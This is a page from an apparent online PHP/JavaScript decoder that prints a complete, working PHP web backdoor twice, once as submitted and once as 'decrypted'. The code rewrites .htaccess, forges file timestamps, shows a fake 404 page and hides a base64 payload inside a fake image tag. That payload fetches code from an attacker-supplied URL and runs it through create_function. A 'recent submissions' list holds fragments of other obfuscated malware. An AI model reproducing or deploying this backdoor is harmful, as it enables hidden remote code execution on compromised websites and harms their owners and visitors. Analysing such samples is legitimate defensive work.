Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
// Silence is golden.
error_reporting(null);
ini_set("display_errors", 0);
$file_contents =
    "<FilesMatch \".(ph|phtml|php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>";
$create_htacess = @fopen(".htaccess", "w");
if ($create_htacess) {
    fwrite($create_htacess, $file_contents);
    fclose($create_htacess);
    chmod(".htaccess", 0444);
    chmod(basename($_SERVER["PHP_SELF"]), 0444);
}
function login_shell()
{
    $random_url = "404NotFound";
    $curl = curl_init();
    $protocol = "http://";
    if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") {
        $protocol = "https://";
    }
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt(
        $curl,
        CURLOPT_USERAGENT,
        "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
    );
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FRESH_CONNECT, true);
    curl_setopt(
        $curl,
        CURLOPT_URL,
        $protocol . $_SERVER["HTTP_HOST"] . "/" . $random_url
    );
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    $server_404 = str_replace(
        "/{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    $server_404 = str_replace(
        "{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    echo $server_404;
    exit();
}
function utf8key($input)
{
    $keyStr =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
    do {
        $enc1 = strpos($keyStr, substr($input, $i++, 1));
        $enc2 = strpos($keyStr, substr($input, $i++, 1));
        $enc3 = strpos($keyStr, substr($input, $i++, 1));
        $enc4 = strpos($keyStr, substr($input, $i++, 1));
        $chr1 = ($enc1 << 2) | ($enc2 >> 4);
        $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
        $chr3 = (($enc3 & 3) << 6) | $enc4;
        $output = $output . chr((int) $chr1);
        if ($enc3 != 64) {
            $output = $output . chr((int) $chr2);
        }
        if ($enc4 != 64) {
            $output = $output . chr((int) $chr3);
        }
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
    } while ($i < strlen($input));
    return urldecode($output);
}
function pre_term_name($auth_data)
{
    $filendate = scandir(getcwd());
    if (!is_dir($filendate[1])) {
        touch(".htaccess", filemtime($filendate[1]));
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1]) && $filendate[1] == __FILE__) {
        touch(__FILE__, filemtime($filendate[3]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1])) {
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    }
    $kses_str = str_replace(["%", "#"], ["/", "+"], $auth_data);
    return @utf8key($kses_str);
}
if (function_exists("curl_exec")) {
    if (!isset($_GET["url"])) {
        login_shell();
    }
}
$wp_default_logo =
    '<img src="data:image/png;ZXJyb3JfcmVwb3J0aW5nKCAwICk7DQoNCmZ1bmN0aW9uIF91cmxfZ2V0X2NvbnRlbnRzICgkdXJsKSB7DQogICAgaWYgKCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfZXhlYycpICl7IA0KICAgICAgICAkY3VybF9jb25uZWN0ID0gY3VybF9pbml0KCAkdXJsICk7DQoNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX1VTRVJBR0VOVCwgIk1vemlsbGEvNS4wKFdpbmRvd3MgTlQgNi4xOyBydjozMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzMyLjAiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX0NPT0tJRUpBUiwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfQ09PS0lFRklMRSwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIA0KICAgICAgICAkY29udGVudF9kYXRhID0gY3VybF9leGVjKCAkY3VybF9jb25uZWN0ICk7DQogICAgfQ0KICAgIGVsc2VpZiAoIGZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSApIHsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCAkdXJsICk7DQogICAgfQ0KICAgIGVsc2Ugew0KICAgICAgICAkaGFuZGxlID0gZm9wZW4gKCAkdXJsICwgInIiKTsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IHN0cmVhbV9nZXRfY29udGVudHMoICRoYW5kbGUgKTsNCiAgICB9DQogICAgICAgIA0KICAgIHJldHVybiAkY29udGVudF9kYXRhOw0KfQ0KDQokY29udGVudF9vdXRwdXQgPSBfdXJsX2dldF9jb250ZW50cygkX0dFVFsndXJsJ10pOw0KZXZhbCAoJz8#JyAuICRjb250ZW50X291dHB1dCk7">';
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name($logo_image);
if (isset($wpautop)) {
    $preg_import =
        "\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";
    $preg_import("", "}" . $wpautop . "//");
}

Decrypted code:

// Silence is golden.
error_reporting(null);
ini_set("display_errors", 0);
$file_contents =
    "<FilesMatch \".(ph|phtml|php)\$\">\n Order allow,deny\n Allow from all\n</FilesMatch>";
$create_htacess = @fopen(".htaccess", "w");
if ($create_htacess) {
    fwrite($create_htacess, $file_contents);
    fclose($create_htacess);
    chmod(".htaccess", 0444);
    chmod(basename($_SERVER["PHP_SELF"]), 0444);
}
function login_shell()
{
    $random_url = "404NotFound";
    $curl = curl_init();
    $protocol = "http://";
    if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] != "off") {
        $protocol = "https://";
    }
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt(
        $curl,
        CURLOPT_USERAGENT,
        "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"
    );
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_FRESH_CONNECT, true);
    curl_setopt(
        $curl,
        CURLOPT_URL,
        $protocol . $_SERVER["HTTP_HOST"] . "/" . $random_url
    );
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    $server_404 = str_replace(
        "/{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    $server_404 = str_replace(
        "{$random_url}",
        $_SERVER["SCRIPT_NAME"],
        $server_404
    );
    echo $server_404;
    
}
function utf8key($input)
{
    $keyStr =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    $chr1 = $chr2 = $chr3 = "";
    $enc1 = $enc2 = $enc3 = $enc4 = "";
    $i = 0;
    $output = "";
    $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
    do {
        $enc1 = strpos($keyStr, substr($input, $i++, 1));
        $enc2 = strpos($keyStr, substr($input, $i++, 1));
        $enc3 = strpos($keyStr, substr($input, $i++, 1));
        $enc4 = strpos($keyStr, substr($input, $i++, 1));
        $chr1 = ($enc1 << 2) | ($enc2 >> 4);
        $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
        $chr3 = (($enc3 & 3) << 6) | $enc4;
        $output = $output . chr((int) $chr1);
        if ($enc3 != 64) {
            $output = $output . chr((int) $chr2);
        }
        if ($enc4 != 64) {
            $output = $output . chr((int) $chr3);
        }
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
    } while ($i < strlen($input));
    return urldecode($output);
}
function pre_term_name($auth_data)
{
    $filendate = scandir(getcwd());
    if (!is_dir($filendate[1])) {
        touch(".htaccess", filemtime($filendate[1]));
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1]) && $filendate[1] == __FILE__) {
        touch(__FILE__, filemtime($filendate[3]));
        touch(".htaccess", filemtime($filendate[1]));
    } elseif (file_exists($filendate[1])) {
        touch(__FILE__, filemtime($filendate[1]));
        touch(".htaccess", filemtime($filendate[1]));
    }
    $kses_str = str_replace(["%", "#"], ["/", "+"], $auth_data);
    return @utf8key($kses_str);
}
if (function_exists("curl_exec")) {
    if (!isset($_GET["url"])) {
        login_shell();
    }
}
$wp_default_logo =
    '<img src="data:image/png;ZXJyb3JfcmVwb3J0aW5nKCAwICk7DQoNCmZ1bmN0aW9uIF91cmxfZ2V0X2NvbnRlbnRzICgkdXJsKSB7DQogICAgaWYgKCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfZXhlYycpICl7IA0KICAgICAgICAkY3VybF9jb25uZWN0ID0gY3VybF9pbml0KCAkdXJsICk7DQoNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX1VTRVJBR0VOVCwgIk1vemlsbGEvNS4wKFdpbmRvd3MgTlQgNi4xOyBydjozMi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzMyLjAiKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGN1cmxfY29ubmVjdCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIDApOw0KICAgICAgICBjdXJsX3NldG9wdCgkY3VybF9jb25uZWN0LCBDVVJMT1BUX0NPT0tJRUpBUiwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjdXJsX2Nvbm5lY3QsIENVUkxPUFRfQ09PS0lFRklMRSwgJEdMT0JBTFNbJ2Nva2knXSk7DQogICAgICAgIA0KICAgICAgICAkY29udGVudF9kYXRhID0gY3VybF9leGVjKCAkY3VybF9jb25uZWN0ICk7DQogICAgfQ0KICAgIGVsc2VpZiAoIGZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSApIHsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCAkdXJsICk7DQogICAgfQ0KICAgIGVsc2Ugew0KICAgICAgICAkaGFuZGxlID0gZm9wZW4gKCAkdXJsICwgInIiKTsNCiAgICAgICAgJGNvbnRlbnRfZGF0YSA9IHN0cmVhbV9nZXRfY29udGVudHMoICRoYW5kbGUgKTsNCiAgICB9DQogICAgICAgIA0KICAgIHJldHVybiAkY29udGVudF9kYXRhOw0KfQ0KDQokY29udGVudF9vdXRwdXQgPSBfdXJsX2dldF9jb250ZW50cygkX0dFVFsndXJsJ10pOw0KZXZhbCAoJz8#JyAuICRjb250ZW50X291dHB1dCk7">';
preg_match('#<img src="data:image/png;(.*)">#', $wp_default_logo, $logo_data);
$logo_image = $logo_data[1];
$wpautop = pre_term_name($logo_image);
if (isset($wpautop)) {
    $preg_import =
        "create_function";
    $preg_import("", "}" . $wpautop . "//");
}

Recent submissions:

file_put_contents($_SERVER['DOCUMENT_ROOT'].'/afcbd322a16f.php','<?php echo 409723*20;if(m... function _0x4db3(_0x1cfe60, _0x57817a) { const _0x393308 = _0x3933() return ( ... \u041d\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043e... HR+cPy/gckRTLN/9w3aFnPSSSAYLNhOtb4h7HEyOCKCF7Z8XcF4fnqnSzxXa/txEpZrfOPH5iwyA Y7j01qi1iKoL... <?php error_reporting(0); function e7061($e){$ed = base64_decode($e);$n = openssl_decrypt(... <?php error_reporting(0); function e7061($e) { $ed = base64_decode($e); $n ... const _0x4320=['ZaBuv','BJyzE3K=','.portfolio-isotope','EmovWPhcTaa=','s2HyuKq=','zSkAxmkG... eval(gzinflate(decode('sUtzDyc1OCei0uhVqH+rTo1xKi9u4qRd5aQjSu2KWBNwCK7TTnBhGnkkqZc870ap+C... \x7b\x52\xe3\x78\x6f\x42\x41\x64\x67\x62... \x6d\x78\x61\x6c\xdd\x62\x4d\x40\x41\x76\x71\x14\x67\x70\x69\x4a\x43\x50\x5b\x60\x6b\x68\x...